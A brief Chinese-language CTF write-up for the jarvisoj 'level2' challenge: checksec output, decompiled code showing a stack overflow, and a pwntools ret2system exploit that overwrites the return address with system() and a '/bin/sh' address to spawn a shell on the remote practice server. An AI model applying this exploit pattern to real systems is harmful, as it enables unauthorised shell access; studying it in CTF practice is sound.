查询保护
liu@liu-F117-F:~/桌面/oj/level2$ checksec level2
[*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level2/level2'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
liu@liu-F117-F:~/桌面/oj/level2$
开启了NX保护
int __cdecl main(int argc, const char **argv, const char **envp)
{
vulnerable_function();
system("echo 'Hello World!'");
return 0;
}
有system函数
.data:0804A024 00000008 C /bin/sh
有/bin/sh字符串
ssize_t vulnerable_function()
{
char buf; // [esp+0h] [ebp-88h]
system("echo Input:");
return read(0, &buf, 0x100u);
}
这里有栈溢出漏洞。
规划:覆盖返回地址到system函数,此时的参数为/bin/sh的地址
exp:
from pwn import *
context.log_level="debug"
system_addr=0x0804845C
bin_sh=0x0804A024
#p=process("./level2")
p=remote("pwn2.jarvisoj.com",9878)
p.recvline()
payload="A"*0x88+"A"*4+p32(system_addr)+p32(bin_sh)
p.sendline(payload)
p.interactive()
普通利用栈溢出用system函数覆盖返回地址,用/bin/sh的地址来覆盖参数